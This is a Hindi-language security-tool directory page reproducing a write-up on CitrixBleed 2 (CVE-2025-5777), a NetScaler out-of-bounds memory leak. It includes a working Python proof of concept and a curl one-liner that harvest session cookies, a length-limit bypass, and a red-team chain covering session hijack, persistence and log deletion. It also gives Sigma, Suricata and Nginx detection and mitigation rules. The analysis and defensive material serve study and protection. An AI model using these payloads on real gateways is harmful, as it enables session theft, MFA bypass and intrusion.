Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CitrixBleed-2-CVE-2025-5777-PoC- — CitrixBleed 2 — CVE-2025-5777 (आउट-ऑफ-बाउंड्स लीक) PoC और डिटेक्शन किट का विस्तृत विवरण | Kitploit
उपकरण/GitHubGitHub/mingshenhk/citrixbleed-2-cve-2025-5777-poc-
रक्षात्मक उपकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगघटना प्रतिक्रिया

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
लैब और अभ्यास
GitHubmingshenhk/citrixbleed-2-cve-2025-5777-poc-

CitrixBleed-2-CVE-2025-5777-PoC-

CitrixBleed 2 — CVE-2025-5777 (आउट-ऑफ-बाउंड्स लीक) PoC और डिटेक्शन किट का विस्तृत विवरण

रिपॉजिटरी देखें
17211 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CitrixBleed 2 (CVE-2025-5777) अंतिम विश्लेषण

NetScaler ADC / Gateway में एक Out-of-Bounds Memory Read — कारण से लेकर हमले और बचाव अभ्यास तक का व्यापक मैनुअल


poc उपयोग: python3 poc.py https://gateway.example.com

exp उपयोग: python3 exp.py https://gateway.example.com admin 7acbb35f4d...

विषय सूची

root@kitploit:~
0x00  परिचय / त्वरित अवलोकन
0x01  पृष्ठभूमि: NetScaler आर्किटेक्चर और CitrixBleed 1 की पुनरावृत्ति
0x02  कमजोरी का विवरण (प्रभावित संस्करण, CVSS, शोषण परिणाम)
0x03  ट्रिगर तंत्र का गहन विश्लेषण (स्रोत कोड स्तर विश्लेषण और डीबग स्क्रीनशॉट)
0x04  न्यूनतम PoC + उन्नत स्कैनिंग स्क्रिप्ट
0x05  रेड टीम दृष्टिकोण: पूर्ण आक्रमण श्रृंखला (खोज → लीक → सत्र अपहरण → आंतरिक नेटवर्क लेटरल मूवमेंट)
0x06  ब्लू टीम दृष्टिकोण: पता लगाना, फोरेंसिक और पैच सत्यापन
0x07  रक्षा सुदृढ़ीकरण: पैच, WAF, कॉन्फ़िगरेशन, संपत्ति प्रबंधन
0x08  सीखने / समीक्षा रोडमैप और व्यावहारिक प्रयोग
परिशिष्ट A  Sigma / Suricata / Nginx-Lua नियम
परिशिष्ट B  पैच/शोषण समयरेखा और IoC स्नैपशॉट
संदर्भ

0x00 परिचय / त्वरित अवलोकन

  • CVE-2025-5777 (जिसे CitrixBleed 2 भी कहा जाता है) Citrix NetScaler ADC / Gateway में एक Out-of-Bounds Memory Read है।
  • हमलावर को प्रमाणीकरण की आवश्यकता नहीं है, बस एक अत्यधिक लंबे Host हेडर के साथ GET अनुरोध भेजने से उपकरण यादृच्छिक मेमोरी ब्लॉक को HTTP प्रतिक्रिया के साथ क्लाइंट को "उगल" देता है।
  • लीक डेटा में अक्सर NSC_USER / NSC_TASS Cookie, SAML StateContext, MFA टोकन जैसी महत्वपूर्ण सामग्री शामिल होती है, जिसका सीधे उपयोग करके सत्र अपहरण और MFA बाईपास किया जा सकता है (arcticwolf.com, tenable.com)।
  • CVSS v4 आधार स्कोर 9.3 (गंभीर) (netscaler.com)।
  • 2025-06-17 को सार्वजनिक, 2025-06-23 को Citrix ने प्रभाव क्षेत्र बढ़ाया और पैच जारी किया; एक सप्ताह के भीतर ReliaQuest, Bishop Fox जैसी सुरक्षा कंपनियों ने वास्तविक दुनिया में शोषण में वृद्धि देखी (reliaquest.com, bishopfox.com)।

0x01 पृष्ठभूमि

1.1 NetScaler कार्यप्रवाह संक्षिप्त विवरण

root@kitploit:~
┌──────────────┐
│ Client       │ ① HTTPS
└──────┬───────┘
       │
┌──────▼───────┐
│ NetScaler    │ ② AAA / Gateway प्रमाणीकरण
│  (WebProc)   │
└──────┬───────┘
       │
┌──────▼───────┐
│ ICA Proxy /  │ ③ आगे एप्लिकेशन पर
│ CVPN / RDP   │
└──────────────┘

NetScaler मल्टी-प्रोसेस + आंतरिक IPC डिज़ाइन का उपयोग करता है। WebProc AAA / Gateway पथ के तहत अधिकांश HTTP अनुरोधों को संभालता है, जिसमें /nf/auth/*, /oauth/* आदि शामिल हैं। यह C भाषा में बड़े पैमाने पर snprintf() / memcpy() का उपयोग करता है, हर बार XML/HTML खंडों को जोड़ता है।

1.2 CitrixBleed 1 (CVE-2023-4966) पुनरावलोकन

  • 2023 में इसी प्रकार की कमजोरी OAuth डिस्कवरी इंटरफ़ेस /oauth/idp/.well-known/openid-configuration पर हुई।
  • इसका सार भी वही है: snprintf के रिटर्न वैल्यू को बाद के send() के len पैरामीटर के रूप में उपयोग करना → मेमोरी ओवर-रीड।
  • CitrixBleed 2 साबित करता है कि उसी प्रकार का सुरक्षा कोडिंग दोष अभी भी अन्य पथों में छिपा हुआ है।

सीखा गया सबक: यदि सुरक्षा पैच केवल "हथौड़ा बिंदु" को लक्षित करते हैं न कि "प्रोग्रामिंग प्रतिमान" को, तो "टेम्पलेटेड पुनरुत्पादन" के लिए जगह बच जाती है।


0x02 कमजोरी का विवरण

फ़ील्डसामग्री
CVECVE-2025-5777
उपनामCitrixBleed 2
कमजोरी प्रकारOut-of-Bounds Read / सूचना रिसाव
CVSS v4 आधार9.3 (गंभीर) (netscaler.com)
प्रभावित संस्करण< 14.1-43.56 ; < 13.1-58.32 ; 13.1-37.235-FIPS/NDcPP ; 12.1-55.327-FIPS (netscaler.com)
शोषण की शर्तेंNetScaler को Gateway (VPN/ICA Proxy/CVPN/RDP Proxy) या AAA वर्चुअल सर्वर के रूप में कॉन्फ़िगर किया गया हो (arcticwolf.com)
शोषण परिणाममेमोरी रिसाव → सत्र टोकन → प्रमाणीकरण बाईपास / MFA बाईपास → लेटरल मूवमेंट

0x03 ट्रिगर तंत्र का गहन विश्लेषण

यह खंड 13.1-55.18 फर्मवेयर के डी-कंपाइलेशन + gdb डीबगिंग पर आधारित है, जो सार्वजनिक ब्लॉग से संकलित है (bishopfox.com)।

3.1 कमजोरी का प्रवेश बिंदु

  • URI: /nf/auth/startwebview.do
  • नियंत्रणीय पैरामीटर: HTTP Host हेडर
  • यह इंटरफ़ेस Citrix Workspace WebView के रीडायरेक्ट XML उत्पन्न करने के लिए उपयोग किया जाता है। सामान्य प्रतिक्रिया का उदाहरण:
root@kitploit:~
<AuthenticateResponse>
  <wv:StartUrl>https://gateway.example.com/Citrix/AAA/start.html</wv:StartUrl>
  ...
</AuthenticateResponse>

3.2 मुख्य फ़ंक्शन श्रृंखला

root@kitploit:~
citrix_webview_handler()
 ├─ build_auth_xml()
 │    ├─ snprintf(buf, 0x1800, TEMPLATE, host_hdr, ... );
 │    └─ return length;           // ⚠️ length 0x1800 से अधिक हो सकता है
 └─ ns_vpn_send_response(conn, 0x980200, buf, length);

बग बिंदु: snprintf "वास्तव में लिखी जाने वाली लंबाई" लौटाता है न कि वास्तविक लिखी गई लंबाई; यदि उपयोगकर्ता द्वारा भेजा गया Host > 0x1800 - स्थिर खंड लंबाई, तो length > sizeof(buf) होगा।

3.3 रनटाइम उदाहरण

root@kitploit:~
buf: [-----XML-----][OOB][OOB][OOB]......            <- 0x1800 बाइट्स सीमा
                          ↑
                 ns_vpn_send_response द्वारा एक साथ भेजा गया

GDB ब्रेकपॉइंट प्रदर्शन (मुख्य रजिस्टर):

root@kitploit:~
RDI (dst) = 0x7fffa2e31800  // buf
RSI (len) = 0x00001e42      // length=7746 (>6144)

read() परिणाम दर्शाता है कि अंतिम 1,600 बाइट्स अप्रारंभीकृत मेमोरी से आते हैं, जहाँ अन्य SSL सत्रों के Cookie बफ़र दिखाई देते हैं।

3.4 लीक डेटा के प्रकार

श्रेणीनमूना खंड (असंवेदनशील बनाया गया)
सत्र CookieSet-Cookie: NSC_USER=john.doe;NSC_TASS=abc123...
MFA/OTP टोकनradius_state=0e2a9c6d1553...
अन्य अनुरोध निकाय<username>audituser</username><password>***</password>

0x04 PoC कार्यान्वयन

4.1 एकल फ़ाइल Python (15 पंक्तियाँ)

root@kitploit:~
#!/usr/bin/env python3
# CVE-2025-5777 न्यूनतम PoC (केवल अधिकृत परीक्षण)
import requests, sys, urllib3, re
urllib3.disable_warnings()

if len(sys.argv) != 2:
    exit(f"उपयोग: {sys.argv[0]} https://NSVIP")

url = sys.argv[1].rstrip("/") + "/nf/auth/startwebview.do"
hdr = {"Host": "A" * 0x6000}               # >0x1800 ट्रिगर करता है
r = requests.get(url, headers=hdr, verify=False, timeout=10)

print("[+] HTTP", r.status_code, "बाइट्स:", len(r.content))
hits = re.findall(br"(NSC_[A-Z]+=[^;]{10,})", r.content)
for h in hits: print("  कुकी लीक ->", h.decode())

open("leak.bin", "wb").write(r.content)
print("[+] ऑफ़लाइन grep के लिए leak.bin सहेजा गया।")
  • निष्पादन के बाद यदि 200 + कई KB वापस आता है, तो कमजोरी मौजूद मानी जाती है।
  • leak.bin से Cookie= और <AuthenticateContext> जैसे कीवर्ड खोजें।

4.2 Bash / curl एक-पंक्ति

root@kitploit:~
curl -ks -H "Host: $(python -c 'print(\"A\"*6000)')" \
     https://NSVIP/nf/auth/startwebview.do -o leak.bin

बाईपास: कुछ उपकरणों पर अग्र-छोर F5 / Nginx ने Host लंबाई सीमा लगा रखी है; इसे एकाधिक उपडोमेन जोड़कर बाईपास किया जा सकता है, जैसे foo.foo.foo.…foo.example.com (3000 बार foo दोहराएं)।


0x05 रेड टीम दृष्टिकोण: पूर्ण आक्रमण श्रृंखला

चरणउद्देश्य और तकनीक
① संपत्ति खोजzoomeye search "http.title:\"NetScaler Gateway\"" + Shodan आदि; set-cookie: NSC_ फ़िल्टर करें
② PoC लीकबैच स्क्रिप्ट के साथ समानांतर अनुरोध; NSC_USER= ; NSC_TASS= कैप्चर करें
③ Cookie पुनर्प्रेषणChrome DevTools→Application→Cookies→एंट्री जोड़ें, /vpn/index.html रीफ्रेश करें
④ आंतरिक संसाधनstoreweb/#home पर RDP फ़ाइलें प्राप्त करें; .ica डाउनलोड करके सीधे VDI लॉगिन करें
⑤ विशेषाधिकार वृद्धिआंतरिक क्रेडेंशियल स्प्रे, Kerberoast, ADCS ESC1; या समान नेटवर्क सेगमेंट पर कमजोर पासवर्ड SMB का उपयोग करें
⑥ स्थायित्वनया Scheduled Task बनाएँ; ऑटो-स्टार्ट स्क्रिप्ट पंजीकृत करें; या NetScaler vDisk संशोधित करें (उच्च विशेषाधिकार के लिए संचालन लापरवाही आवश्यक)
⑦ निशान साफ़ करनाCookie उपयोग के बाद तुरंत हटाएँ; ऑडिट लॉग हटाएँ (यदि NS रूट मिले); या logrotate रेस का उपयोग करके ओवरराइट करें

वास्तविक मामला: ReliaQuest ने ग्राहक गेटवे पर "थोड़े समय में बड़ी संख्या में 6 KB+ Host हेडर अनुरोध → तुरंत सत्र चोरी" देखा (reliaquest.com)।


0x06 ब्लू टीम दृष्टिकोण: पता लगाना, फोरेंसिक और पैच सत्यापन

6.1 लॉग और IoC

स्रोतअभिव्यक्ति
/var/log/ns.logAAA_TRANSACTION <client_ip> - Host header length: 6144
HTTP_ACCESS.log/nf/auth/startwebview.do अनुरोध अत्यंत कम समय में लेकिन असामान्य रूप से बड़ी प्रतिक्रिया आकार (> 2 KB)
EDR/PCAPSet-Cookie: NSC_USER= गैर-लॉगिन अनुरोधों की प्रतिक्रिया में दिखाई देना

6.2 Sigma नियम (संक्षिप्त संस्करण)

root@kitploit:~
title: CitrixBleed2 Host Header OOB Leak
status: experimental
logsource:
  category: webserver
  product: netscaler
detection:
  selection:
    cs-uri-stem: "/nf/auth/startwebview.do"
    cs-bytes|gt: 2048
    c-host|strlen|gt: 4096
  condition: selection
level: critical

6.3 पैच सत्यापन स्क्रिप्ट

root@kitploit:~
nscli -s 127.0.0.1:3008 \
      -c "show ns version" | grep -E "13\.1-58\.32|14\.1-43\.56" \
      && echo "पैच किया गया ✅" || echo "कमजोर ❌"

6.4 सत्र समाप्त करें

root@kitploit:~
# सभी सक्रिय VPN/ICA कनेक्शन हटाएँ
kill icaconnection -all
kill vpn -all

नोट: पैच के बाद भी जबरन लॉगआउट करना आवश्यक है, ताकि हमलावर पहले से चुराए गए Cookie का उपयोग जारी न रख सकें।


0x07 रक्षा सुदृढ़ीकरण

  1. आधिकारिक पैच: ≥ 14.1-43.56 / 13.1-58.32 पर अपग्रेड करें, या FIPS/NDcPP मॉडल के लिए संबंधित संस्करण लागू करें (netscaler.com)।
  2. Host Header लंबाई सीमा (अस्थायी उपाय)
root@kitploit:~
map $http_host $block_long_host {
    default          0;
    "~^.{4097,}$"    1;
}
server {
    ...
    if ($block_long_host) { return 413; }
}
  1. WAF अनुकूली नियम: /nf/auth/ और /oauth/ पथों के लिए दर सीमा सक्षम करें (जैसे 20 अनुरोध/मिनट)।
  2. संपत्ति सूची: EOL संस्करण 12.1/13.0 को कभी भी आधिकारिक पैच नहीं मिलेगा, प्रतिस्थापन या मजबूत अलगाव की योजना बनाएं (support.citrix.com)।
  3. MFA सुरक्षा: सत्र रिसाव MFA को बायपास करता है → "प्रति अनुरोध हस्ताक्षर" या "गतिशील रूप से बंधे हार्डवेयर फिंगरप्रिंट" चालू करने की अनुशंसा, न कि केवल पहले लॉगिन पर सत्यापन।

0x08 सीखने / समीक्षा रोडमैप

चरणसुझावित सामग्री और कार्य
सिद्धांतCitrix सुरक्षा बुलेटिन, Arctic Wolf / Tenable FAQ, Bishop Fox तकनीकी डिकोडिंग पढ़ें (arcticwolf.com, tenable.com, bishopfox.com)
प्रयोगकमजोर संस्करण 13.1-55.18 (ESXi / KVM) तैनात करें, न्यूनतम PoC चलाएँ, Wireshark से पैकेट कैप्चर करें → TCP PSH प्रतिक्रिया का निरीक्षण करें
कोडिंगPoC को बदलें: स्वचालित Cookie पुनर्प्रेषण, ZTLS बैच स्कैनिंग, मल्टी-थ्रेडेड कतार जोड़ें
ब्लू टीमदो घंटे की विंडो में असामान्य Host लंबाई खोजें; Sigma→Elastic/Graylog का उपयोग करें; WAF नीतियों का पुनरुत्पादन और सत्यापन करें
साझा करेंब्लॉग लिखें या माइंड मैप बनाएँ, "समान snprintf उपयोग जाल" का सारांश दें

परिशिष्ट A — पता लगाना / रक्षा टुकड़े

📜 Sigma नियम पूर्ण संस्करण
root@kitploit:~
title: Netscaler CitrixBleed2 Large Host Header
id: 4d6f1e1b-0bfe-4473-a732-3e7e9a21f650
status: experimental
description: /nf/auth/startwebview.do के अनुरोधों में असामान्य Host हेडर लंबाई का पता लगाता है
references:
  - https://nvd.nist.gov/vuln/detail/CVE-2025-5777
author: mingshenhk
logsource:
  product: netscaler
  service: http_access
detection:
  selection:
    cs-uri-stem: "/nf/auth/startwebview.do"
    c-host|strlen|gt: 4096
  condition: selection
level: critical
🛡️ Suricata नियम
root@kitploit:~
alert http any any -> any any (
  msg:"CitrixBleed2 CVE-2025-5777 Host header overflow";
  http.uri; content:"/nf/auth/startwebview.do"; nocase;
  http.header; field:Host; content:"AAAAAAAA"; within:0; distance:0; offset:4096;
  classtype:attempted-recon;
  sid:5777002; rev:1;
)
🔒 Nginx-Lua इनलाइन हॉटपैच
root@kitploit:~
-- access_by_lua_block
local host = ngx.var.http_host or ""
if #host > 4096 then
  ngx.log(ngx.WARN,"[CitrixBleed2] अवरुद्ध Host लंबाई=",#host)
  return ngx.exit(ngx.HTTP_REQUEST_HEADER_FIELDS_TOO_LARGE)
end

परिशिष्ट B — समयरेखा

दिनांक (2025)घटना
06-17Citrix ने CVE-2025-5777 की प्रारंभिक घोषणा जारी की (netscaler.com)
06-18Bishop Fox ने पहला तकनीकी विश्लेषण और PoC जारी किया (bishopfox.com)
06-23Citrix ने प्रभाव क्षेत्र + पैच संस्करण अपडेट किया; CISA ने इसे KEV में शामिल किया
06-25ReliaQuest ने सक्रिय शोषण की रिपोर्ट दी, खतरा समूह बड़े पैमाने पर सत्र चुरा रहे हैं (reliaquest.com)
06-27BleepingComputer ने "संभवतः बड़े पैमाने पर शोषण" की रिपोर्ट दी (bleepingcomputer.com)
06-28कई GitHub PoC दिखाई दिए; Tenable ने FAQ जारी किया (tenable.com)

संदर्भ

  1. Citrix आधिकारिक सुरक्षा अधिसूचना और पैच विवरण (netscaler.com)
  2. Arctic Wolf "CVE-2025-5777 तकनीकी ब्रीफिंग" (arcticwolf.com)
  3. Bishop Fox "NetScaler में OOB मेमोरी रीड" (bishopfox.com)
  4. ReliaQuest "थ्रेट स्पॉटलाइट: CitrixBleed 2" (reliaquest.com)
  5. Tenable CVE-2025-5777 पर FAQ (tenable.com)
  6. BleepingComputer सुरक्षा अपडेट (bleepingcomputer.com)
  7. NVD CVE-2025-5777 प्रविष्टि (nvd.nist.gov)
  8. Citrix सपोर्ट KB CTX693420 (support.citrix.com)

समाप्त — आशा है यह दस्तावेज़ आपको CitrixBleed 2 को पूरी तरह से समझने और उससे निपटने में मदद करेगा। यदि आपको और उदाहरणों, स्क्रिप्ट या अभ्यास मार्गदर्शन की आवश्यकता हो, तो कृपया बेझिझक पूछें!

टूल डाउनलोड करें